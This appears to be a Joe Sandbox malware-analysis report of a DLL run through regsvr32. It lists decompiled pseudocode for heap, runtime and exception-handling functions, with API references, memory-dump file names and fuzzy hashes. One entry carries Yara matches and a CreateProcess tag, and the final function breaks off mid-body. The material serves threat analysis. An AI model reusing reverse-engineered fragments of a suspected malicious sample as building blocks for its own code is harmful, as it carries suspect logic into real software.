                                                                                                        				intOrPtr _t14;
                                                                                                        
                                                                                                        				if (__rcx == 0) goto 0x123daa17;
                                                                                                        				_t14 =  *0x1244f930; // 0xc40000, executed
                                                                                                        				_t1 = HeapFree(_t11, ??); // executed
                                                                                                        				if (_t1 != 0) goto 0x123daa12;
                                                                                                        				_t3 = E00007FFC7FFC123DB34C(GetLastError(), __rax, _t14, __rcx);
                                                                                                        				_t4 = E00007FFC7FFC123DB420(__rax);
                                                                                                        				 *__rax = _t3;
                                                                                                        				return _t4;
                                                                                                        			}








                                                                                                        0x7ffc123da9df
                                                                                                        0x7ffc123da9eb
                                                                                                        0x7ffc123da9f2
                                                                                                        0x7ffc123da9fa
                                                                                                        0x7ffc123daa04
                                                                                                        0x7ffc123daa0b
                                                                                                        0x7ffc123daa10
                                                                                                        0x7ffc123daa17

                                                                                                        APIs
                                                                                                        • RtlReleasePrivilege.NTDLL(?,?,00000000,00007FFC123DF492,?,?,?,00007FFC123DF4CF,?,?,00000000,00007FFC123DF144,?,?,?,00007FFC123DF077), ref: 00007FFC123DA9F2
                                                                                                        • GetLastError.KERNEL32(?,?,00000000,00007FFC123DF492,?,?,?,00007FFC123DF4CF,?,?,00000000,00007FFC123DF144,?,?,?,00007FFC123DF077), ref: 00007FFC123DA9FC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastPrivilegeRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 1334314998-0
                                                                                                        • Opcode ID: 1178260e8bffcb175f16ce8929f72affff1d2575aebcf493ec367cb625912061
                                                                                                        • Instruction ID: 81b81c8cf6e18e8299a9fbccac5443e3db3a55168ae8f1164a23d754fdc8dfd5
                                                                                                        • Opcode Fuzzy Hash: 1178260e8bffcb175f16ce8929f72affff1d2575aebcf493ec367cb625912061
                                                                                                        • Instruction Fuzzy Hash: 29E0861CF09D1E53FF095BB155440F421595FD8720FC04074C80D46252EEACECB5D234
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276448850.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
                                                                                                        • Instruction ID: b9dfd44ec2654d149dbfc67a3d285e1c446cc2681133f70a5a1c8efdf6c35088
                                                                                                        • Opcode Fuzzy Hash: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
                                                                                                        • Instruction Fuzzy Hash: 59415D7090C7848FE7B8DF18D48979ABBE0FB88315F108A1EE48DC7291DB349448CB46
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 50%
                                                                                                        			E00007FFC7FFC123D22B0(long long __rax, long long __rcx, long long __rdx, long long _a8, long long _a16, signed char _a24) {
                                                                                                        				long long _v16;
                                                                                                        				signed char _v24;
                                                                                                        				intOrPtr* _t48;
                                                                                                        				intOrPtr* _t50;
                                                                                                        
                                                                                                        				_t48 = __rax;
                                                                                                        				_a24 = r8b;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				E00007FFC7FFC123D2830(__rax, _a8);
                                                                                                        				if (_t48 - _a16 >= 0) goto 0x123d22de;
                                                                                                        				E00007FFC7FFC123D2230(_a8);
                                                                                                        				E00007FFC7FFC123D2150(_t48, _a8);
                                                                                                        				if ( *_t48 - _a16 >= 0) goto 0x123d2310;
                                                                                                        				E00007FFC7FFC123D2170(_t48, _a8);
                                                                                                        				E00007FFC7FFC123D2600(_a8, _a16,  *_t48); // executed
                                                                                                        				goto 0x123d237a;
                                                                                                        				if ((_a24 & 0x000000ff) == 0) goto 0x123d2366;
                                                                                                        				if (_a16 - 0x10 >= 0) goto 0x123d2366;
                                                                                                        				E00007FFC7FFC123D2170(_t48, _a8);
                                                                                                        				if (_a16 -  *_t48 >= 0) goto 0x123d2341;
                                                                                                        				_t50 = _a16;
                                                                                                        				_v16 = _t50;
                                                                                                        				goto 0x123d2353;
                                                                                                        				E00007FFC7FFC123D2170(_t50, _a8);
                                                                                                        				_v16 =  *_t50;
                                                                                                        				E00007FFC7FFC123D1910(1,  *_t50, _a8, _v16);
                                                                                                        				goto 0x123d237a;
                                                                                                        				if (_a16 != 0) goto 0x123d237a;
                                                                                                        				E00007FFC7FFC123D23A0( *_t50, _a8, _a16);
                                                                                                        				if (_a16 <= 0) goto 0x123d238c;
                                                                                                        				_v24 = 1;
                                                                                                        				goto 0x123d2394;
                                                                                                        				_v24 = 0;
                                                                                                        				return _v24 & 0x000000ff;
                                                                                                        			}







                                                                                                        0x7ffc123d22b0
                                                                                                        0x7ffc123d22b0
                                                                                                        0x7ffc123d22b5
                                                                                                        0x7ffc123d22ba
                                                                                                        0x7ffc123d22c8
                                                                                                        0x7ffc123d22d2
                                                                                                        0x7ffc123d22d9
                                                                                                        0x7ffc123d22e3
                                                                                                        0x7ffc123d22f0
                                                                                                        0x7ffc123d22f7
                                                                                                        0x7ffc123d2309
                                                                                                        0x7ffc123d230e
                                                                                                        0x7ffc123d2317
                                                                                                        0x7ffc123d231f
                                                                                                        0x7ffc123d2326
                                                                                                        0x7ffc123d2333
                                                                                                        0x7ffc123d2335
                                                                                                        0x7ffc123d233a
                                                                                                        0x7ffc123d233f
                                                                                                        0x7ffc123d2346
                                                                                                        0x7ffc123d234e
                                                                                                        0x7ffc123d235f
                                                                                                        0x7ffc123d2364
                                                                                                        0x7ffc123d236c
                                                                                                        0x7ffc123d2375
                                                                                                        0x7ffc123d2380
                                                                                                        0x7ffc123d2382
                                                                                                        0x7ffc123d238a
                                                                                                        0x7ffc123d238c
                                                                                                        0x7ffc123d239d

                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FFC123D2830: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D283E
                                                                                                          • Part of subcall function 00007FFC123D2830: Concurrency::details::SchedulerBase::ThrottlerDispatchBridge.LIBCMTD ref: 00007FFC123D284B
                                                                                                        • _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC123D22D9
                                                                                                          • Part of subcall function 00007FFC123D2170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D217E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$EmptyQueue::StructuredWork$Base::BridgeDispatchMtx_guardMtx_guard::~_SchedulerThrottler
                                                                                                        • String ID:
                                                                                                        • API String ID: 1903167320-0
                                                                                                        • Opcode ID: 8412a15bbd2f4d89551e98d62f984fcb6a76ab0910fb464f93224fef732d8c49
                                                                                                        • Instruction ID: 8c621a9bc4af3f84e2ffb7526f7744ff89a0217f2d2b8ca0ae1003ce7c62af27
                                                                                                        • Opcode Fuzzy Hash: 8412a15bbd2f4d89551e98d62f984fcb6a76ab0910fb464f93224fef732d8c49
                                                                                                        • Instruction Fuzzy Hash: 1021FE2A90CE9D82DB109A15E4503AE6774FBC57B0FD04471E78D4766ACEADD460CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00007FFC7FFC123E060C(void* __ecx, intOrPtr* __rax, long long __rbx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {
                                                                                                        
                                                                                                        				_a8 = __rbx;
                                                                                                        				_a16 = __rsi;
                                                                                                        				_a24 = __rdi;
                                                                                                        				if (__ecx - 0x2000 < 0) goto 0x123e0654;
                                                                                                        				E00007FFC7FFC123DB420(__rax);
                                                                                                        				 *__rax = 9;
                                                                                                        				E00007FFC7FFC123D9744();
                                                                                                        				return 9;
                                                                                                        			}



                                                                                                        0x7ffc123e060c
                                                                                                        0x7ffc123e0611
                                                                                                        0x7ffc123e0616
                                                                                                        0x7ffc123e0629
                                                                                                        0x7ffc123e062b
                                                                                                        0x7ffc123e0635
                                                                                                        0x7ffc123e0637
                                                                                                        0x7ffc123e0653

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                        • String ID:
                                                                                                        • API String ID: 3215553584-0
                                                                                                        • Opcode ID: 9630306cbb1685fa6066e691d321c691ce288c67f2e3b59aeca8e9753d6d96fe
                                                                                                        • Instruction ID: 9713d6b753a6c4a0e66b6b234ca9b374994cb3d49d510f1f1766c2038a9c3f91
                                                                                                        • Opcode Fuzzy Hash: 9630306cbb1685fa6066e691d321c691ce288c67f2e3b59aeca8e9753d6d96fe
                                                                                                        • Instruction Fuzzy Hash: 3F119379A08EBE82E3009B14E4445B9A3A9EBC0760F950574D68D67792DEBCE434CB20
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 37%
                                                                                                        			E00007FFC7FFC123DAAD0(void* __eax, signed int __rcx, signed int __rdx) {
                                                                                                        				intOrPtr* _t22;
                                                                                                        				signed int _t29;
                                                                                                        
                                                                                                        				_t29 = __rdx;
                                                                                                        				if (__rcx == 0) goto 0x123daaef;
                                                                                                        				_t1 = _t29 - 0x20; // -32
                                                                                                        				_t22 = _t1;
                                                                                                        				if (_t22 - __rdx < 0) goto 0x123dab32;
                                                                                                        				_t25 =  ==  ? _t22 : __rcx * __rdx;
                                                                                                        				goto 0x123dab16;
                                                                                                        				if (E00007FFC7FFC123DE958() == 0) goto 0x123dab32;
                                                                                                        				if (E00007FFC7FFC123D97EC(_t22,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x123dab32;
                                                                                                        				RtlAllocateHeap(??, ??, ??); // executed
                                                                                                        				if (_t22 == 0) goto 0x123dab01;
                                                                                                        				goto 0x123dab3f;
                                                                                                        				E00007FFC7FFC123DB420(_t22);
                                                                                                        				 *_t22 = 0xc;
                                                                                                        				return 0;
                                                                                                        			}





                                                                                                        0x7ffc123daad0
                                                                                                        0x7ffc123daadf
                                                                                                        0x7ffc123daae3
                                                                                                        0x7ffc123daae3
                                                                                                        0x7ffc123daaed
                                                                                                        0x7ffc123daafb
                                                                                                        0x7ffc123daaff
                                                                                                        0x7ffc123dab08
                                                                                                        0x7ffc123dab14
                                                                                                        0x7ffc123dab25
                                                                                                        0x7ffc123dab2e
                                                                                                        0x7ffc123dab30
                                                                                                        0x7ffc123dab32
                                                                                                        0x7ffc123dab37
                                                                                                        0x7ffc123dab44

                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(?,?,00000000,00007FFC123DBAAE,?,?,?,00007FFC123DB429,?,?,?,?,00007FFC123E0426,?,?,00000000), ref: 00007FFC123DAB25
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 280286a628102559a8464dffd4b609b20cb420f0fe1f18d1be992a8bc7a4b5f6
                                                                                                        • Instruction ID: 8622c05b044b352195a5798f226792eb49fe072ad35ef0ac2f76b45de1a40eb4
                                                                                                        • Opcode Fuzzy Hash: 280286a628102559a8464dffd4b609b20cb420f0fe1f18d1be992a8bc7a4b5f6
                                                                                                        • Instruction Fuzzy Hash: A8F0490CF0AA2F41FE585B6196112F5129A5FD8B60FCC5470C80E862D2EDECE9B3C234
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 37%
                                                                                                        			E00007FFC7FFC123DAA18(intOrPtr* __rax, void* __rcx) {
                                                                                                        
                                                                                                        				if (__rcx - 0xffffffe0 > 0) goto 0x123daa63;
                                                                                                        				_t16 =  ==  ? __rax : __rcx;
                                                                                                        				goto 0x123daa4a;
                                                                                                        				if (E00007FFC7FFC123DE958() == 0) goto 0x123daa63;
                                                                                                        				if (E00007FFC7FFC123D97EC(__rax,  ==  ? __rax : __rcx) == 0) goto 0x123daa63;
                                                                                                        				RtlAllocateHeap(??, ??, ??); // executed
                                                                                                        				if (__rax == 0) goto 0x123daa35;
                                                                                                        				goto 0x123daa70;
                                                                                                        				E00007FFC7FFC123DB420(__rax);
                                                                                                        				 *__rax = 0xc;
                                                                                                        				return 0;
                                                                                                        			}



                                                                                                        0x7ffc123daa25
                                                                                                        0x7ffc123daa2f
                                                                                                        0x7ffc123daa33
                                                                                                        0x7ffc123daa3c
                                                                                                        0x7ffc123daa48
                                                                                                        0x7ffc123daa56
                                                                                                        0x7ffc123daa5f
                                                                                                        0x7ffc123daa61
                                                                                                        0x7ffc123daa63
                                                                                                        0x7ffc123daa68
                                                                                                        0x7ffc123daa75

                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(?,?,?,00007FFC123E040D,?,?,00000000,00007FFC123DD8B7,?,?,?,00007FFC123DA427,?,?,?,00007FFC123DA31D), ref: 00007FFC123DAA56
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 4885db743ff87431de90f68300da65782b6b7874996cc61f6450c8fa48a4abb9
                                                                                                        • Instruction ID: def6e046f66a9f6e35a8ecdcc5da6a60cdbd4fbe32d0415b32c772b7aa5be912
                                                                                                        • Opcode Fuzzy Hash: 4885db743ff87431de90f68300da65782b6b7874996cc61f6450c8fa48a4abb9
                                                                                                        • Instruction Fuzzy Hash: 04F03A0DE09A2F45FA5456615B412F511984FC4770FCC07B0D82E452C2DDECA462C630
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 44%
                                                                                                        			E00007FFC7FFC123D1B10(void* __rax, long long __rcx, long long __rdx, long long _a8, long long _a16) {
                                                                                                        				void* _t7;
                                                                                                        				void* _t8;
                                                                                                        
                                                                                                        				_t8 = __rax;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				E00007FFC7FFC123D11A0(_a16);
                                                                                                        				_t7 = E00007FFC7FFC123D1B40(_t8, _a8, _a16, _t8); // executed
                                                                                                        				return _t7;
                                                                                                        			}





                                                                                                        0x7ffc123d1b10
                                                                                                        0x7ffc123d1b10
                                                                                                        0x7ffc123d1b15
                                                                                                        0x7ffc123d1b23
                                                                                                        0x7ffc123d1b35
                                                                                                        0x7ffc123d1b3e

                                                                                                        APIs
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC123D1B23
                                                                                                          • Part of subcall function 00007FFC123D1B40: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D1B6E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Base::Concurrency::details::ContextIdentityQueueWorkchar_traits
                                                                                                        • String ID:
                                                                                                        • API String ID: 1444011685-0
                                                                                                        • Opcode ID: f789d12e206d7980509269e3e814af15646fd7b4fc038a1338794e0a1668acec
                                                                                                        • Instruction ID: f0ada0ce050c7dc9f67d79a705baa0bead92aabb14f41c8bfc14934420b3599d
                                                                                                        • Opcode Fuzzy Hash: f789d12e206d7980509269e3e814af15646fd7b4fc038a1338794e0a1668acec
                                                                                                        • Instruction Fuzzy Hash: 0DD09E6A929A8582D644EB52F89109AA764FBC47D0FC05475FACE42B2ADF68C1618B00
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 65%
                                                                                                        			E00007FFC7FFC123D9474(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
                                                                                                        				void* __rdi;
                                                                                                        				void* _t36;
                                                                                                        				int _t40;
                                                                                                        				void* _t45;
                                                                                                        				intOrPtr _t53;
                                                                                                        				signed long long _t63;
                                                                                                        				long long _t66;
                                                                                                        				_Unknown_base(*)()* _t86;
                                                                                                        				void* _t90;
                                                                                                        				void* _t91;
                                                                                                        				void* _t93;
                                                                                                        				signed long long _t94;
                                                                                                        				struct _EXCEPTION_POINTERS* _t100;
                                                                                                        
                                                                                                        				_t46 = __ecx;
                                                                                                        				 *((long long*)(_t93 + 0x10)) = __rbx;
                                                                                                        				 *((long long*)(_t93 + 0x18)) = __rsi;
                                                                                                        				_t91 = _t93 - 0x4f0;
                                                                                                        				_t94 = _t93 - 0x5f0;
                                                                                                        				_t63 =  *0x1244e008; // 0x2d0c2734ea27
                                                                                                        				 *(_t91 + 0x4e0) = _t63 ^ _t94;
                                                                                                        				_t53 = r8d;
                                                                                                        				_t45 = __ecx;
                                                                                                        				if (__ecx == 0xffffffff) goto 0x123d94b3;
                                                                                                        				E00007FFC7FFC123D493C(_t36);
                                                                                                        				r8d = 0x98;
                                                                                                        				E00007FFC7FFC123D6920(__ecx, 0, _t53, __esp, _t94 + 0x70, __rdx, _t86, __r8);
                                                                                                        				r8d = 0x4d0;
                                                                                                        				E00007FFC7FFC123D6920(_t46, 0, _t53, __esp, _t91 + 0x10, __rdx, _t86, __r8);
                                                                                                        				 *((long long*)(_t94 + 0x48)) = _t94 + 0x70;
                                                                                                        				_t66 = _t91 + 0x10;
                                                                                                        				 *((long long*)(_t94 + 0x50)) = _t66;
                                                                                                        				__imp__RtlCaptureContext();
                                                                                                        				r8d = 0;
                                                                                                        				__imp__RtlLookupFunctionEntry();
                                                                                                        				if (_t66 == 0) goto 0x123d9546;
                                                                                                        				 *(_t94 + 0x38) =  *(_t94 + 0x38) & 0x00000000;
                                                                                                        				 *((long long*)(_t94 + 0x30)) = _t94 + 0x58;
                                                                                                        				 *((long long*)(_t94 + 0x28)) = _t94 + 0x60;
                                                                                                        				 *((long long*)(_t94 + 0x20)) = _t91 + 0x10;
                                                                                                        				__imp__RtlVirtualUnwind();
                                                                                                        				 *((long long*)(_t91 + 0x108)) =  *((intOrPtr*)(_t91 + 0x508));
                                                                                                        				 *((intOrPtr*)(_t94 + 0x70)) = __edx;
                                                                                                        				 *((long long*)(_t91 + 0xa8)) = _t91 + 0x510;
                                                                                                        				 *((long long*)(_t91 - 0x80)) =  *((intOrPtr*)(_t91 + 0x508));
                                                                                                        				 *((intOrPtr*)(_t94 + 0x74)) = _t53;
                                                                                                        				_t40 = IsDebuggerPresent();
                                                                                                        				SetUnhandledExceptionFilter(_t86, _t90);
                                                                                                        				if (UnhandledExceptionFilter(_t100) != 0) goto 0x123d95a8;
                                                                                                        				if (_t40 != 0) goto 0x123d95a8;
                                                                                                        				if (_t45 == 0xffffffff) goto 0x123d95a8;
                                                                                                        				return E00007FFC7FFC123D3A70(E00007FFC7FFC123D493C(_t42), _t45, 0,  *(_t91 + 0x4e0) ^ _t94);
                                                                                                        			}
















                                                                                                        0x7ffc123d9474
                                                                                                        0x7ffc123d9474
                                                                                                        0x7ffc123d9479
                                                                                                        0x7ffc123d9482
                                                                                                        0x7ffc123d948a
                                                                                                        0x7ffc123d9491
                                                                                                        0x7ffc123d949b
                                                                                                        0x7ffc123d94a2
                                                                                                        0x7ffc123d94a7
                                                                                                        0x7ffc123d94ac
                                                                                                        0x7ffc123d94ae
                                                                                                        0x7ffc123d94ba
                                                                                                        0x7ffc123d94c0
                                                                                                        0x7ffc123d94cb
                                                                                                        0x7ffc123d94d1
                                                                                                        0x7ffc123d94db
                                                                                                        0x7ffc123d94e4
                                                                                                        0x7ffc123d94e8
                                                                                                        0x7ffc123d94ed
                                                                                                        0x7ffc123d9502
                                                                                                        0x7ffc123d9505
                                                                                                        0x7ffc123d950e
                                                                                                        0x7ffc123d9510
                                                                                                        0x7ffc123d9523
                                                                                                        0x7ffc123d9530
                                                                                                        0x7ffc123d9539
                                                                                                        0x7ffc123d9540
                                                                                                        0x7ffc123d954d
                                                                                                        0x7ffc123d955f
                                                                                                        0x7ffc123d9563
                                                                                                        0x7ffc123d9571
                                                                                                        0x7ffc123d9575
                                                                                                        0x7ffc123d9579
                                                                                                        0x7ffc123d9583
                                                                                                        0x7ffc123d9596
                                                                                                        0x7ffc123d959a
                                                                                                        0x7ffc123d959f
                                                                                                        0x7ffc123d95ce

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 1239891234-0
                                                                                                        • Opcode ID: d9a81825362c2da034dc73a6dcc45eb26ccc4f6f61a283cd1a377bdfab111a7c
                                                                                                        • Instruction ID: ef0e7ff1a4151e49f4bcc798ac9ea9e4c0c987d842c126bd651e610fae388ddc
                                                                                                        • Opcode Fuzzy Hash: d9a81825362c2da034dc73a6dcc45eb26ccc4f6f61a283cd1a377bdfab111a7c
                                                                                                        • Instruction Fuzzy Hash: 08318C3A608F9586EB60CB25E8402EE73A4FB88764F800136EA9D43B95DF78D165CB10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 49%
                                                                                                        			E00007FFC7FFC123D3240(void* __edx, void* __eflags, long long __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, intOrPtr _a40, long long _a48) {
                                                                                                        				long long _v16;
                                                                                                        				long long _v24;
                                                                                                        				long long _v32;
                                                                                                        				long long _v40;
                                                                                                        				long long _v48;
                                                                                                        				long long _v56;
                                                                                                        				long long _v64;
                                                                                                        				long long _v72;
                                                                                                        				long long _v80;
                                                                                                        				long long _v88;
                                                                                                        				long long _v96;
                                                                                                        				long long _v104;
                                                                                                        				long long _v112;
                                                                                                        				long long _v120;
                                                                                                        				long long _v128;
                                                                                                        				long long _v136;
                                                                                                        				long long _t207;
                                                                                                        				intOrPtr* _t209;
                                                                                                        				intOrPtr _t218;
                                                                                                        				intOrPtr _t221;
                                                                                                        				long long _t223;
                                                                                                        				void* _t225;
                                                                                                        				intOrPtr _t228;
                                                                                                        				long long _t229;
                                                                                                        				void* _t230;
                                                                                                        				intOrPtr _t235;
                                                                                                        				long long _t237;
                                                                                                        				void* _t239;
                                                                                                        				void* _t243;
                                                                                                        				long long _t245;
                                                                                                        				void* _t247;
                                                                                                        				long long _t248;
                                                                                                        				void* _t249;
                                                                                                        				long long _t250;
                                                                                                        				void* _t251;
                                                                                                        				long long _t257;
                                                                                                        
                                                                                                        				_t207 = __rax;
                                                                                                        				_a32 = __r9;
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
